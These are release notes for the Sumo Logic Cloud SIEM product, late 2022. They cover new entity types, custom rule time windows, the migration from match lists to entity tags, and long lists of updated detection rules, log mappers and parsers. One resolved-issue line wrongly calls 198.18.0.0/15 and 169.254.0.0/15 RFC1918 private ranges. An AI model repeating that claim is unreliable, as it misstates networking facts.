Eight new predefined Entity types have been added to Cloud SIEM. This will enable customers to more accurately associate Signals and Insights with security threats. They are listed below long with the related normalized record schema attributes (which can be specified in Rule definitions):

Entity TypeSchema Attributes
CommandcommandLine
Domainhttp_referer_fqdn, http_url_fqdn
EmailtargetUser_email, user_email
Filefile_path, file_basename
Hashfile_hash_imphash, file_hash_md5, file_hash_pehash, file_hash_sha1, file_hash_sha256, file_hash_ssdeep
ProcessbaseImage, parentBaseImage
URLhttp_url
User Agenthttp_userAgent

If you already had a custom Entity type with the same or similar name, it will not be affected and will not be automatically migrated to the corresponding standard Entity type.

Entity Notes

Similar to the functionality on Insights, users can now attach notes to Entities:

Screenshot of Entity Notes user interface

These notes are retained permanently on the associated Entity and are visible to all users who can view the Entity.

Custom Time Windows for Rules

Threshold, Aggregation and Chain Rules now support custom time windows. Previously, when writing a Rule, a time window had to be chosen from a list of predefined options. With this new enhancement, users can define any time window defined in minutes, hours, or days, with a minimum of 1 minute and a maximum of 5 days (120 hours):

Screenshot of Custom Time Window for Rules user interface

Inventory Favorite Fields

Where inventory data is shown for an Entity, such as the Entity details page or the Insight details page, users can now “favorite” the inventory fields that should be shown in the summary list.

To do this, simply expand the Full Details view, hover to the left of the field, and click the star icon that appears. To remove the favorite selection, simply unclick the star icon. The field selections are applied across all users and retained across sessions. (This behavior is the same as for favorite fields on Records.)

Screenshot of Inventory Favorite Fields user interface

Minor Changes and Enhancements

  • [Updated] The previously announced migration of our out-of-the-box rules from standard match lists to Entity tags has been postponed. New dates for this migration will be announced in the near future.
  • [New] Service providers using the Consolidated Insight List can now see Insights from client organizations across deployments.
  • [Updated] The usability of filters for list views when searching for an object that includes a specific tag schema has been enhanced.
  • [Removed] The link to download the Insight Enrichment Service has been removed from the Enrichment page. The link is specified in the installation instructions online.
  • [New] Users can now filter Records by Sensor Zone.

Resolved Issues

  • Importing data from CSV files via the UI was not working properly.
  • The http_url field was not being concatenated properly in some mapper scenarios.
  • Entity domain normalization was not working properly.
  • The Copy Expression feature in the UI did not copy Boolean values to the clipboard properly.
  • The Rule Tuning Expression list page was not auto-refreshing correctly.
  • Users were unable to filter the Signals list based on severity.
  • IP addresses in the 198.18.0.0/15 and 169.254.0.0/15 ranges were not being marked as private subnets per RFC1918.
  • Users without the proper permissions were able to add comments and Signals to Insights.
  • Regular expressions ending with an asterisk * were not working properly in search/list filters.

December 8, 2022 - Content Release

Rules

  • [Updated] MATCH-S00159 Windows - Permissions Group Discovery

Log Mappers

  • [Updated] Azure Administrative logs
  • [Updated] Azure NSG Flows
  • [Updated] Squid Proxy - Parser
  • [Updated] Windows - Security - 4624

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco ASA
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

December 1, 2022 - Content Release

Log Mappers

  • [New] Azure Risky Users
  • [New] Azure User Risk Events
  • [New] CrowdStrike Falcon CustomerIOCEvent (CNC)
  • [New] CrowdStrike Falcon Host API IdpDetectionSummaryEvent (CNC)
  • [New] CrowdStrike Falcon Identity Protection (CNC)
  • [New] Microsoft Office 365 RecordType 105
  • [New] Microsoft Office 365 RecordType 37
  • [New] Microsoft Office 365 RecordType 57
  • [New] Windows - Security - Default
  • [Updated] Azure Event Hub - Windows Defender Logs
  • [Updated] Cisco ASA 106100 JSON
  • [Updated] Microsoft Office 365 Events
  • [Updated] Windows - Security - 4740

Parsers

  • [New] /Parsers/System/Microsoft/Microsoft Azure Nested JSON
  • [New] /Parsers/System/Microsoft/Windows-JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

November 22, 2022 - Content Release

Rules

  • [Updated] MATCH-S00570 WMIPRVSE Spawning Process

Log Mappers

  • [Updated] Gigamon Threat Insight - Catch All
  • [Updated] Gigamon Threat Insight - Suricata
  • [Updated] Microsoft Office 365 Threat Intelligence Url Events

Parsers

  • [New] /Parsers/System/Gigamon/GigamonTI
  • [Updated] /Parsers/System/Lacework/Lacework JSON
  • [Updated] /Parsers/System/Palo Alto/PAN Firewall CSV

Schema

  • [Updated] baseImage
  • [Updated] commandLine
  • [Updated] file_basename
  • [Updated] file_hash_imphash
  • [Updated] file_hash_md5
  • [Updated] file_hash_pehash
  • [Updated] file_hash_sha1
  • [Updated] file_hash_sha256
  • [Updated] file_hash_ssdeep
  • [Updated] file_path
  • [Updated] http_referer_fqdn
  • [Updated] http_url
  • [Updated] http_url_fqdn
  • [Updated] http_userAgent
  • [Updated] parentBaseImage
  • [Updated] targetUser_email
  • [Updated] user_email

November 17, 2022 - Content Release

Log Mappers

  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 1
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 15
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 6
  • [Updated] Windows - Microsoft-Windows-Sysmon/Operational - 7

Parsers

  • [Updated] /Parsers/System/Microsoft/Sysmon-JSON

November 15, 2022 - Content Release

Rules

  • [New] MATCH-S00822 Potential Microsoft Office In-Memory Token Theft
  • [Updated] MATCH-S00556 Outbound Data Transfer Protocol Over Non-standard Port

Log Mappers

  • [New] Cisco Meraki 8021x
  • [New] Cisco Meraki Client Association
  • [Updated] Microsoft Office 365 Threat Intelligence Url Events

Parsers

  • [Updated] /Parsers/System/Cisco/Cisco Meraki

November 11, 2022 - Content Release

Rules

  • [Updated] MATCH-S00582 Malicious Service Installs
  • [Updated] THRESHOLD-S00087 Slack - Possible Session Hijacking

Log Mappers

  • [New] BigQuery Gmail C2C - Catch All
  • [New] BigQuery Gmail C2C - Error in Delivery
  • [New] BigQuery Gmail C2C - Failed Delivery
  • [New] BigQuery Gmail C2C - Message was dropped by Gmail
  • [New] BigQuery Gmail C2C - Message was rejected by Google Groups
  • [Updated] AWSGuardDuty_Catch_All
  • [Updated] AWSGuardDuty_Discovery
  • [Updated] Azure Access Logs
  • [Updated] Azure Action Logs
  • [Updated] Azure Administrative logs
  • [Updated] Azure AuditEvent logs
  • [Updated] Azure ManagedIdentitySignInLogs
  • [Updated] Azure NonInteractiveUserSignInLogs
  • [Updated] Azure ServicePrincipalSignInLogs
  • [Updated] Azure Storage Analytics
  • [Updated] Azure Write and Delete Logs
  • [Updated] AzureActivityLog
  • [Updated] AzureActivityLog 01
  • [Updated] AzureActivityLog AuditLogs
  • [Updated] AzureDevOpsAuditing
  • [Updated] AzureDiagnosticLog
  • [Updated] Cisco ASA 113039 JSON
  • [Updated] Cisco Ironport MID - Custom Parser
  • [Updated] Cisco Ironport SFIMS - Custom Parser
  • [Updated] Cisco Ironport WSA - Custom Parser
  • [Updated] GCP App Engine Logs
  • [Updated] GCP Audit Logs
  • [Updated] GCP Firewall
  • [Updated] GCP Parser - Load Balancer
  • [Updated] GCP VPC Flows
  • [Updated] Kubernetes
  • [Updated] Office 365 - Exchange Admin Events
  • [Updated] Windows - Security - 4697
  • [Updated] Windows - Security - 4820

Parsers

  • [New] /Parsers/System/Google/GCP BigQuery Gmail
  • [Updated] /Parsers/System/Citrix/Citrix NetScaler Syslog
  • [Updated] /Parsers/System/Dell/Dell SonicWall
  • [Updated] /Parsers/System/Infoblox/Infoblox

Schema

  • [New] device_k8s_normalizedDeploymentName
  • [New] device_k8s_normalizedReplicaSetName
  • [New] dstDevice_k8s_normalizedDeploymentName
  • [New] dstDevice_k8s_normalizedReplicaSetName
  • [New] srcDevice_k8s_normalizedDeploymentName
  • [New] srcDevice_k8s_normalizedReplicaSetName

October 27, 2022 - Content Release

Rules

  • [New] CHAIN-S00011 Potential InstallUtil Allow List Bypass
  • [Updated] MATCH-S00818 Azure PRT Token Issued via Non Interactive Login
  • [Updated] MATCH-S00464 Suspicious Non-Standard InstallUtil Execution

Log Mappers

  • [Updated] AWS - Application Load Balancer - ALB
  • [Updated] AWS - Application Load Balancer - JSON
  • [Updated] AWS API Gateway
  • [Updated] AWS CloudFront
  • [Updated] AWS EKS - Custom Parser
  • [Updated] AWS Elastic Load Balancer - Custom Parser
  • [Updated] AWS GuardDuty Alerts from Sumo CIP
  • [Updated] AWS Inspector - Custom Parser
  • [Updated] AWS Network Firewall Alerts
  • [Updated] AWS Network Firewall Flow
  • [Updated] AWS Network Firewall Netflow
  • [Updated] AWS Route 53 Logs
  • [Updated] AWS S3 Server Access Log - Custom Parser
  • [Updated] AWS Security Hub
  • [Updated] AWS Trusted Advisor
  • [Updated] AWS VPC Flow Logs - Default Format
  • [Updated] AWS VPC Flow Logs - JSON Format
  • [Updated] AWS WAF Allow Logs
  • [Updated] AWS WAF Block Logs
  • [Updated] AWSGuardDuty_Backdoor
  • [Updated] AWSGuardDuty_Behavior
  • [Updated] AWSGuardDuty_Catch_All
  • [Updated] AWSGuardDuty_CryptoCurrency
  • [Updated] AWSGuardDuty_Discovery
  • [Updated] AWSGuardDuty_Exfiltration
  • [Updated] AWSGuardDuty_PenTest
  • [Updated] AWSGuardDuty_Persistence
  • [Updated] AWSGuardDuty_Policy
  • [Updated] AWSGuardDuty_ResourceConsumption
  • [Updated] AWSGuardDuty_Stealth
  • [Updated] AWSGuardDuty_Trojan
  • [Updated] AwsServiceEvent-AWS API Call via CloudTrail
  • [Updated] CloudTrail - application-insights.amazonaws.com - ListApplications
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - CreateTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - DeleteTrail
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StartLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - StopLogging
  • [Updated] CloudTrail - cloudtrail.amazonaws.com - UpdateTrail
  • [Updated] CloudTrail - cognito-idp.amazonaws.com - CreateUserPoolClient
  • [Updated] CloudTrail - controltower.amazonaws.com - CreateManagedAccount
  • [Updated] CloudTrail - ec2.amazonaws.com - AttachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - AuthorizeSecurityGroupIngress
  • [Updated] CloudTrail - ec2.amazonaws.com - BidEvictedEvent
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - CreateNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteCustomerGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAcl
  • [Updated] CloudTrail - ec2.amazonaws.com - DeleteNetworkAclEntry
  • [Updated] CloudTrail - ec2.amazonaws.com - DetachInternetGateway
  • [Updated] CloudTrail - ec2.amazonaws.com - ImportKeyPair
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclAssociation
  • [Updated] CloudTrail - ec2.amazonaws.com - ReplaceNetworkAclEntry
  • [Updated] CloudTrail - ecr.amazonaws.com - PolicyExecutionEvent
  • [Updated] CloudTrail - elasticfilesystem.amazonaws.com - NewClientConnection
  • [Updated] CloudTrail - iam.amazonaws.com - AttachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - AttachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreateAccessKey
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - CreatePolicyVersion
  • [Updated] CloudTrail - iam.amazonaws.com - CreateUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeletePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUser
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPermissionsBoundary
  • [Updated] CloudTrail - iam.amazonaws.com - DeleteUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - DetachUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutGroupPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutRolePolicy
  • [Updated] CloudTrail - iam.amazonaws.com - PutUserPolicy
  • [Updated] CloudTrail - iam.amazonaws.com - UpdateAssumeRolePolicy
  • [Updated] CloudTrail - kms.amazonaws.com - DisableKey
  • [Updated] CloudTrail - kms.amazonaws.com - RotateKey
  • [Updated] CloudTrail - kms.amazonaws.com - ScheduleKeyDeletion
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteDestination
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogGroup
  • [Updated] CloudTrail - logs.amazonaws.com - DeleteLogStream
  • [Updated] CloudTrail - organizations.amazonaws.com - CreateAccountResult
  • [Updated] CloudTrail - s3.amazonaws.com - CreateBucket
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - DeleteBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketAcl
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketCors
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketLifecycle
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketPolicy
  • [Updated] CloudTrail - s3.amazonaws.com - PutBucketReplication
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationStarted
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - RotationSucceeded
  • [Updated] CloudTrail - secretsmanager.amazonaws.com - SecretVersionDeletion
  • [Updated] CloudTrail - signin.amazonaws.com - CheckMfa
  • [Updated] CloudTrail - signin.amazonaws.com - ConsoleLogin
  • [Updated] CloudTrail - signin.amazonaws.com - ExitRole
  • [Updated] CloudTrail - signin.amazonaws.com - RenewRole
  • [Updated] CloudTrail - signin.amazonaws.com - SwitchRole
  • [Updated] CloudTrail - sso.amazonaws.com - Federate
  • [Updated] CloudTrail - sso.amazonaws.com - ListProfilesForApplication
  • [Updated] CloudTrail Default Mapping
  • [Updated] Falco Detection JSON
  • [Updated] Juniper SSG Series Firewall - Audit Messaging
  • [Updated] Juniper SSG Series Firewall - Traffic Messaging
  • [Updated] Microsoft IIS Parser - Catch All
  • [Updated] Recon_EC2_PortProbeUnprotectedPort
  • [Updated] Recon_EC2_Portscan
  • [Updated] Recon_IAMUser
  • [Updated] UnauthorizedAccess_EC2_SSHBruteForce
  • [Updated] UnauthorizedAccess_EC2_TorClient
  • [Updated] UnauthorizedAccess_EC2_TorIPCaller
  • [Updated] UnauthorizedAccess_EC2_TorRelay
  • [Updated] UnauthorizedAccess_IAMUser

Parsers

  • [Renamed] /Parsers/System/Juniper/Juniper SSC Series Firewall Syslog -> /Parsers/System/Juniper/Juniper SSG Series Firewall Syslog
  • [New] /Parsers/System/Netskope/Netskope Security Cloud JSON
  • [Updated] /Parsers/System/Falco/Falco JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft IIS

October 20, 2022 - Content Release

Rules

  • [Updated] MATCH-S00640 Kubernetes Pod Created in Kube Namespace
  • [Updated] MATCH-S00642 Kubernetes Service Account Created in Kube Namespace

Log Mappers

  • [New] Juniper SSC Series Firewall - Audit Messaging
  • [New] Juniper SSC Series Firewall - Traffic Messaging
  • [New] Linux-Sysmon/Operational - 1
  • [New] Linux-Sysmon/Operational - 10
  • [New] Linux-Sysmon/Operational - 11
  • [New] Linux-Sysmon/Operational - 15
  • [New] Linux-Sysmon/Operational - 16
  • [New] Linux-Sysmon/Operational - 17
  • [New] Linux-Sysmon/Operational - 18
  • [New] Linux-Sysmon/Operational - 2
  • [New] Linux-Sysmon/Operational - 23
  • [New] Linux-Sysmon/Operational - 3
  • [New] Linux-Sysmon/Operational - 4
  • [New] Linux-Sysmon/Operational - 5
  • [New] Linux-Sysmon/Operational - 6
  • [New] Linux-Sysmon/Operational - 7
  • [New] Linux-Sysmon/Operational - 8
  • [New] Linux-Sysmon/Operational - 9
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Azure Advanced Threat Protection
  • [New] Microsoft Graph Security API C2C - Dynamic Vendor/Product - Microsoft Defender for Cloud Apps
  • [Updated] Kubernetes
  • [Updated] Microsoft Office 365 Threat Intelligence Events

Parsers

  • [New] /Parsers/System/Juniper/Juniper SSC Series Firewall Syslog
  • [New] /Parsers/System/Linux/Linux Sysmon XML

Schema

  • [New] device_k8s_deployment
  • [New] device_k8s_namespace
  • [New] device_k8s_normalizedPodName
  • [New] device_k8s_pod
  • [New] device_k8s_replicaSet
  • [New] dstDevice_k8s_deployment
  • [New] dstDevice_k8s_namespace
  • [New] dstDevice_k8s_normalizedPodName
  • [New] dstDevice_k8s_pod
  • [New] dstDevice_k8s_replicaSet
  • [New] srcDevice_k8s_deployment
  • [New] srcDevice_k8s_namespace
  • [New] srcDevice_k8s_normalizedPodName
  • [New] srcDevice_k8s_pod
  • [New] srcDevice_k8s_replicaSet
  • [Updated] device_container_runtime

October 20, 2022 - Application Update

Support for Custom Inventory Sources

Cloud SIEM now supports custom sources of inventory data. Now, if you want to ingest inventory data from a source that Sumo Logic does not provide a pre-built connnector for, you can use this new feature. See the new document Configure a Custom Inventory Source for details.

Standard Match Lists

As a reminder, the migration for our out-of-the-box rules content from standard match lists to tags for Entities has begun. The system is now automatically setting the appropriate tags for any Entities appearing in any of the standard match lists called out in the previous announcement. This will continue until January 20, 2023, when the migration will be complete.

Minor Changes and Enhancements

  • [New] API endpoints have been creeated enabling users to upload attribute changes (such as tags or criticality) for multiple Entities in a single call, rather than having to do so one at a time. The new endpoints are /entities/bulk-add-tags, /entities/bulk-update-tags, /entities/bulk-remove-tags, /entities/bulk-update-suppressed, and /entities/bulk-update-criticality. Note that these API endpoints have a limit of 1000 entries per call. More details are available via the API Documentation link in Cloud SIEM.
  • [Updated] Previously, a new feature was added to the Enrichments tab that enabled you to hide any attribute-value pair with an "empty" value for clarity. This included values like "0" or "N/A". However, some of those values are often useful to the analyst (for example, number_of_threat_reports="0"). Starting with this release, this feature will only hide attributes with truly empty values (i.e., attribute="").

Resolved Issues

  • The CSV file upload method for updating Entity attributes did not support sensor zones or normalized entity names properly.
  • Cloud SIEM has switched providers of lists of public dynamic DNS domains, which has resolved an issue with rules utilizing these lists.

October 13, 2022 - Application Update

Announcement: Standard Match Lists Migration to Entity Tags

Currently, Cloud SIEM defines a set of standard Match Lists as a way to allow users to specify lists of Entities and other indicators that should affect whether or not Rules create Signals. However, starting next week, the Rules included with Cloud SIEM will begin transitioning to leverage Entity tags for this purpose instead. Tags on Entities are more flexible and can also provide context to analysts during the investigation phase.

Next week, a new set of standard tag schemas will be introduced in Cloud SIEM. These tag schemas will correspond to the existing standard Match Lists:

KeyAllowed ValuesEquivalent Match List
_deviceGroupadminadmin_ips
awsAdminAWS_admin_ips
businessbusiness_ips
gcpAdminGCP_admin_ips
googleWorkspaceAdminGoogle_Workspace_admin_ips
salesforceAdminsalesforce_admin_ips
sandboxsandbox_ips
scanTargetscanner_targets
_deviceServicednsdns_servers
dns_servers_dst
dns_servers_src
ftpftp_servers
smtpsmtp_servers
sqlsql_servers
sshssh_servers
telnettelnet_servers
_deviceTypeauthServerauth_servers
auth_servers_dst
auth_servers_src
lanScannerlan_scanner_exception_ips
nmsnms_ips
paloAltoSinkholepalo_alto_sinkhole_ips
proxyServerproxy_servers
proxy_servers_dst
proxy_servers_src
vpnServervpn_servers
vulnerabilityScannervuln_scanners
webServerhttp_servers
_networkTypeguestguest_networks
natnat_ips
vpnvpn_networks
_userGroupawsAdminAWS_admin_users
dsReplicationds_replication_authorized_users
gcpAdminGCP_admin_users
googleWorkspaceAdminGoogle_Workspace_admin_users
kerberosDowngradedowngrade_krb5_etype_authorized_users
salesforceAdminsalesforce_admin_users

(There are five standard match lists not affected by this change, as they do not contain Entities. These include: business_asns, business_domains, business_hostnames, threat, and verified_uri_paths.)

Beginning Thursday, October 20, the contents of the standard match lists listed above will automatically be copied to tags set on the individual entities. So, for example, if an Entity 1.2.3.4 is in match list sql_servers, a tag _deviceService:sql will be set on it. Cloud SIEM will continue to automatically create these tags from the standard match lists for a period of 3 months, until January 20, 2023. During this period, pre-defined rules will be updated to reference these tags instead of the standard match lists, so by the end of this period all rules will be updated and Cloud SIEM will no longer automatically create these tags.

Please update any process you use to maintain the members of standard match lists by January 20, 2023 to maintain standard Entity tags instead (or in addition). We highly recommend you take advantage of Entity Groups to set Entity tags rather than individually setting tags. Entity Groups enable the automatic application of attributes like tags based on the Entity's value, IP address range, or inventory group.

Note that you cannot extend the standard tag schemas (for example, you cannot add a value azureAdmin to _userGroup). (The underscore prefix in the schema name means it's a system-defined schema.) Instead, create a different tag schema (such as customUserGroup) with such extended values.

You can refer to Entity tags in Rule expressions. For example, if you've attached the tag _deviceService:sql to an Entity, this statement will return "true" if that Entity is listed in a Record's srcDevice_ip field:

array_contains(fieldTags["srcDevice_ip"], "_deviceService:sql")

Additional information about the standard tag schema, match lists, Entity groups, and using these features with Rules is available in the Cloud SIEM Documentation.

Minor Changes and Enhancements

  • [New] Users can now filter object lists based on tag schema. The list results will include all objects that have a tag that are part of that schema. For example, if you search for _networkType (from the note above) the list results will include any object that has a tag of _networkType:guest, _networkType:nat, and/or _networkType:vpn.

Resolved Issues

  • Entity relationships were not taking sensor zones into account properly.
  • Entity details pages were only briefly displaying the proper Criticality.
  • The Entities Count links on the Entity Criticality list pages were pointing at the wrong URLs.

October 12, 2022 - Introducing Sumo Logic Open Source Docs

Welcome to the Sumo Logic Cloud SIEM Release Notes on our new docs site! We're now open source and encourage you to contribute. We welcome all contributions, from minor typo fixes to brand new docs. Your expertise and sharing can help fellow users learn and expand their knowledge of Sumo Logic.

Here you'll find information about new and enhanced features, updated content (like rules, log mappers and parsers), bug fixes, and other important announcements for Cloud SIEM.

To view Release Notes from previous years, check the archive.

Click here to subscribe

October 6, 2022 - Application Update

Application Update: Minor Changes and Enhancements

  • [Updated] Dynamic severity in rules has been enhanced. Users can now specify ranges of values to match to a specific severity. There are now multiple options, and these options can be combined (the first rule that matches is used; if none match then the default is used):
    • Equal to Exact string or mathematical match ("Equal to 4" will match "4" and 4.0 but not 4.01)
    • Greater than and Less than Mathematical only, not inclusive ("Less than 5" will match 4.9 but not 5)
    • Between Mathematical only, inclusive ("Between 5 and 10" will match 5 or 7 but not 10.1)
    • Not in the record Will match when the attribute is not listed in the record. (if there is no "bro_irc_value" attribute then this rule will match; if "bro_irc_value" exists but is empty/null, this does not match)
  • [New] Users can now filter the Signals list based on the type of Rule that generated the Signal (Match, Chain, Aggregation, etc.)
  • [New] Users can now perform negative keyword searches ("not:aws" would return all objects that do not include the keyword "aws")
  • [New] Entity domain normalization can now be managed via Terraform
  • [New] Users can now configure the Email Action to send emails in plain text in addition to the previously supported multipart HTML5/text format
  • [New] Changes to the Insight Threshold are now noted in the Audit Log
  • [Deleted] As previously announced, the IBM Resilient and Sensor actions have been removed from Cloud SIEM

Resolved Issues

  • Match list items were not matching properly in some instances, such as after deletion
  • Keyword searches did not properly support values (such as hostnames) with embedded dashes
  • Changes to prototype state were not visible in the rule history
  • In some cases, the system was parsing domain names/TLDs incorrectly

Content Release

Log Mappers
  • [New] Azure Application Service Console Logs
  • [New] Google G Suite Alert Center - Sensitive Admin Action
  • [Updated] Azure Event Hub - Windows Defender Logs - DeviceAlertEvents
Parsers
  • [Updated] /Parsers/System/Google/G Suite Alert Center
Legacy Parsers
  • [Updated] CISCO_MERAKI_SECURITY_FILTERING_FILE_SCANNED
  • [Updated] CISCO_MERAKI_URLS
  • [Updated] Twistlock_Logs

September 29, 2022 - Content Release

Rules

  • [Deleted] MATCH-S00070 Checkpoint Firewall

Log Mappers

  • [New] Cyber Ark EPM AggregateEvent
  • [New] Cyber Ark EPM AuditAdmin
  • [New] Cyber Ark EPM GetComputer
  • [New] Cyber Ark EPM Policy
  • [New] Cyber Ark EPM RawDetails
  • [New] Cyber Ark EPM RawEvents

Parsers

  • [New] /Parsers/System/Cyber-Ark/CyberArk EPM JSON
  • [Updated] /Parsers/System/Auth0/Auth0

September 19, 2022 - Content Release

Rules

  • [Deleted] CHAIN-S00009 Proofpoint TAP Click Permitted Followed by Successful Request

Log Mappers

  • [New] Wiz Catch All
  • [Updated] Orca Security Parser - Catch All

Schema

  • [New] cloud_provider
  • [New] cloud_region
  • [New] cloud_service
  • [New] cloud_zone
  • [New] device_container_id
  • [New] device_container_name
  • [New] device_container_runtime
  • [New] device_image
  • [New] device_type
  • [New] dstDevice_container_id
  • [New] dstDevice_container_name
  • [New] dstDevice_container_runtime
  • [New] dstDevice_image
  • [New] dstDevice_type
  • [New] resourceType
  • [New] srcDevice_container_id
  • [New] srcDevice_container_name
  • [New] srcDevice_container_runtime
  • [New] srcDevice_image
  • [New] srcDevice_type
  • [Updated] dstDevice_uniqueId

September 12, 2022 - Application Update

Insight Enrichment Server for Fed deployment

[Update] We’ve released a new version of the Insight Enrichment Server that runs on the Sumo Logic FedRAMP-compliant deployment. This makes Cloud SIEM on FedRAMP functionally equivalent to commercial deployments of Cloud SIEM.


September 9, 2022 - Application Update

Minor Changes and Enhancements

  • [New] An API endpoint has been added which enables user to delete multiple entries in a match list in one operation: POST: /match-list-items/bulk-delete
  • [Updated] When inventory data for hosts includes both private and public IP addresses, that data will be attached to both Entities. Previously it was only attached to one of the IP address Entities.
  • [Updated] Previously we announced that the severity attribute for Insights in the Audit Logs would be switching from numbers (1-4) to text (LOW, MEDIUM, HIGH, etc). Instead, we have retained the existing numerical attribute and added a new attribute severityName containing the human-readable text.

Resolved Issues

  • In some Audit Log messages related to Insight comments, the insight_readable_id was not set correctly.
  • In some cases, manually adding or removing tags in an Insight was not being recorded in the Audit Logs properly.
  • For some customers, the bar chart on the Records list page was not rendering properly.
  • Time/date stamps were not being displayed consistently across the UI.
  • Some pages were returning intermittent 404 or internal errors.

September 8, 2022 - Content Release

In one week (2022-09-15), we will be removing CHAIN-S00009 - 'Proofpoint TAP Click Permitted Followed by Successful Request' rule to consolidate Proofpoint TAP rules while providing equivalent detection value.

Rules

  • [Updated] MATCH-S00819 Chromium Process Started With Debugging Port

Log Mappers

  • [Updated] Aruba ClearPass Syslog

Parsers

  • [Updated] /Parsers/System/HP/Aruba ClearPass - Syslog
  • [Updated] /Parsers/System/Microsoft/Microsoft Azure JSON
  • [Updated] /Parsers/System/Microsoft/Microsoft IIS

September 1, 2022 - Application Update

Announcements

  • Starting October 1, 2022, _suppressed _Signals will be retained in Cloud SIEM for 30 days (previously, they were retained for 90 days). All Signals are automatically stored in the Sumo sec_signals index for 2 years, so users searching for suppressed Signals more than 30 days old should search in that index instead of in the Cloud SIEM UI.
    • Note also that in the past, Signals attached to Insights were searchable from the Cloud SIEM Signals list page indefinitely. Starting on October 1, they will only be searchable for 365 days. (They will still be visible from the Insight details page beyond that period.)
  • As previously announced, the Sensor and IBM Resilient actions are no longer supported. They will be removed from Cloud SIEM by the end of this month.

Minor Changes and Enhancements

  • [New] In the Audit Log, when an Insight is created, the sum of the included Signals' severity is now included with the insight in the risk_score field (i.e. if there were three Signals each with a severity of 4, the sum of 12 will be included).
  • [Updated] The "Copy Expression" mouse action for record fields can now be activated using Shift+Click. The Click action now brings up a "Copy Value" action instead.
  • [New] Users can now delete Match Lists from the list view (i.e. users no longer have to go into the details).
  • [New] On the Criticality list page, the number of Entity Groups associated with each Criticality is now listed on the cards.

Resolved Issues

  • In some cases where the Signals were relatively old, the Signals that contributed to an Insight were no longer visible in the Insight in the UI.
  • Time stamps were missing from Records in some views.

Content Release

In 2 weeks (2022-09-15) we will be removing CHAIN-S00009 - 'Proofpoint TAP Click Permitted Followed by Successful Request' rule to consolidate Proofpoint TAP rules while providing equivalent detection value.

Rules
  • [New] MATCH-S00818 Azure PRT Token Issued via Non Interactive Login
  • [New] MATCH-S00821 Chromium Browser History Access by Non-Browser Process
  • [New] MATCH-S00819 Chromium Process Started With Debugging Port
  • [New] MATCH-S00820 Cloud Credential File Accessed
  • [New] MATCH-S00817 Suspicious Azure Active Directory Device Code Authentication
  • [Updated] MATCH-S00235 Azure - Create User
Log Mappers
  • [New] Mimecast AV Event
  • [New] Mimecast Impersonation Event
  • [New] Mimecast Spam Event
  • [Updated] AzureActivityLog AuditLogs

August 25, 2022 - Application Update

Application Update

Cloud SIEM App is now available

The Cloud SIEM app gives you visibility into what’s going on in Cloud SIEM. The app dashboards present high-level and detailed views into the Records that were created, the Signals that have fired, and the Insights generated by Cloud SIEM. You can also get insight in Cloud SIEM rules, including rule management activity, and which rules have fired.

This app is available to all licensed Cloud SIEM customers in the Sumo Logic App Catalog. For more information, see Cloud SIEM App.

Content Release

Rules
  • [Updated] MATCH-S00632 Okta Administrator Access Granted
  • [Updated] MATCH-S00683 Overly Permissive Chmod Command
Log Mappers
  • [New] Check Point Avanan
  • [New] Cisco ISE Authentication Failure
  • [New] Cisco ISE Authentication Success
  • [New] Cisco ISE Catch All
  • [New] FireEye Web MPS Event
  • [Updated] Microsoft Office 365 Threat Intelligence Events
  • [Updated] Windows Microsoft-Windows-Sysmon/Operational 3
  • [Updated] Windows Security 4688
Parsers
  • [New] /Parsers/System/Check Point/Check Point Avanan JSON
